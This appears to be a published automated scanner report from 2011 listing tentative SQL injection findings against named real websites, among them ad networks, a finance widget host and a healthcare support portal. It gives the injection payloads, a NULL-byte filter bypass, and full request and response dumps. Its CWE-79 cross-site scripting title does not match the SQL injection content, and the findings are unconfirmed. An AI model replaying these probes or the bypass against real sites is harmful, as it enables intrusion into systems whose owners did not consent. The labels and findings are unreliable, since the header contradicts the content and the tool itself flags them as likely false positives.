CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Report generated by XSS.CX at Mon May 02 17:44:31 CDT 2011.
1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ads2.adbrite.com
Path:
/v0/ad
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Content-Type: application/x-javascript Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQn_3NjAoYv7jF4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:58:57 GMT Set-Cookie: vsd=0@1@4dbeaa91@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:57 GMT Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk29%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT Connection: close Server: XPEHb/1.0 Accept-Ranges: none Date: Mon, 02 May 2011 12:58:57 GMT Content-Length: 2784
var AdBrite_Title_Color_Default = '0000FF'; var AdBrite_Text_Color_Default = '000000'; var AdBrite_Background_Color_Default = 'FFFFFF'; var AdBrite_Border_Color_Default = 'CCCCCC'; var AdBrite_URL_Color_Default = '008000'; function AdBrite_IAB_Zone_Test_Color(color) { if (typeof(color) != 'string') return false; if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false; return color; } var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color); var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color) ...[SNIP]...
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
var AdBrite_Title_Color_Default = '0000FF'; var AdBrite_Text_Color_Default = '000000'; var AdBrite_Background_Color_Default = 'FFFFFF'; var AdBrite_Border_Color_Default = 'CCCCCC'; var AdBrite_URL_Col ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 11934797%20or%201%3d1--%20 and 11934797%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 18059503%20or%201%3d1--%20 and 18059503%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /8/B0/97%20and%201%3d1--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 2778 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:29 GMT Connection: close Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1
</font>
</body> </html> <!-- [HttpException] at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath) at System.Web.CachedPathData.GetConfigPathData(String configPath) at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp) at System.Web.HttpContext.GetFilePathData() at System.Web.HttpContext.GetConfigurationPathData() at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context) at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow) at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute) at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status) --><!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
Request 2
GET /8/B0/97%20and%201%3d2--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 2720 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:29 GMT Connection: close Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
</font>
</body> </html> <!-- [HttpException] at System.Web.CachedPathData.GetConfigPathData(String configPath) at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp) at System.Web.HttpContext.GetFilePathData() at System.Web.HttpContext.GetConfigurationPathData() at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context) at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow) at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute) at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e) --><!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00'&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 5181 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:17 GMT Connection: close Vary: Accept-Encoding
<html> <head> <title>A potentially dangerous Request.QueryString value was detected from the client (qs="...!2&Vrrjf%7<B;").</title> <style> body {fon ...[SNIP]... <b> Exception Details: </b> ...[SNIP]... <code>
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code> ...[SNIP]...
Request 2
GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00''&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: image/jpg Content-Length: 4894 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:18 GMT Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /C/AE/42%20and%201%3d1--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 2720 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:17 GMT Connection: close Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
</font>
</body> </html> <!-- [HttpException] at System.Web.CachedPathData.GetConfigPathData(String configPath) at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp) at System.Web.HttpContext.GetFilePathData() at System.Web.HttpContext.GetConfigurationPathData() at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context) at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow) at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute) at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e) --><!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
Request 2
GET /C/AE/42%20and%201%3d2--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1 Host: cr0.worthathousandwords.com Proxy-Connection: keep-alive Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 2778 Cache-Control: private, max-age=3600 Date: Mon, 02 May 2011 15:28:17 GMT Connection: close Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1
</font>
</body> </html> <!-- [HttpException] at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath) at System.Web.CachedPathData.GetConfigPathData(String configPath) at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp) at System.Web.HttpContext.GetFilePathData() at System.Web.HttpContext.GetConfigurationPathData() at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context) at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow) at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute) at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status) --><!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
The ASPSESSIONIDQSASBQTR cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDQSASBQTR cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<td class="MainBody" bgcolor="#FFFFFF" valign="top"> <H2>Welcome!</H2> Already registered? Please <A HREF='login.asp'>login.</A><BR><BR> If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>
<BR><BR> <align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B> <BR><BR> <width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto’s password policy requires that a strong passwo ...[SNIP]...
<td class="MainBody" bgcolor="#FFFFFF" valign="top"> <H2>Welcome!</H2> Already registered? Please <A HREF='login.asp'>login.</A><BR><BR> If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>
<BR><BR> <align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B> <BR><BR> <width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto’s password policy requires that a strong password consist of at least eight (8) characters and contain three of th ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 83147941%20or%201%3d1--%20 and 83147941%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13805294%20or%201%3d1--%20 and 13805294%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 02 May 2011 12:50:42 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 21455
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_ad = new Object(); google_ad.n = 1; google_ad.type = "te ...[SNIP]... ica.com/LP/0986607f354b447abb58ebd9e4ca88bf/a.aspx%3Frm_state%3Db%249ec973e97c8140bbb19f14a3efbea1fd%7Ce%240%7Cl%240%7Cu%24"; google_ad.visible_url = "www.SpringboardAmerica.com"; google_ad.line1 = "Illegal Immigrants:"; google_ad.line2 = "Should their kids become citizens?"; google_ad.line3 = "Share your opinion now!"; google_ad.regionname = ""; google_ads[11] = google_ad; google_ad = new Object(); ...[SNIP]...
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Mon, 02 May 2011 12:50:43 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 21850
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_ad = new Object(); google_ad.n = 1; google_ad.type = "te ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 19754759%20or%201%3d1--%20 and 19754759%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The p parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14286747'%20or%201%3d1--%20 and 14286747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets14286747'%20or%201%3d1--%20/multiwidget3/TA/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets14286747' or 1=1-- /multiwidget3/TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets14286747'%20or%201%3d2--%20/multiwidget3/TA/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.02577 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:45:48 GMT Connection: close Content-Length: 36118
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets14286747' or 1=2-- /multiwidget3/TA/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20680832'%20or%201%3d1--%20 and 20680832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget320680832'%20or%201%3d1--%20/TA/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget320680832' or 1=1-- /TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget320680832'%20or%201%3d2--%20/TA/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:46:10 GMT Connection: close Content-Length: 36118
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget320680832' or 1=2-- /TA/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 99172217'%20or%201%3d1--%20 and 99172217'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
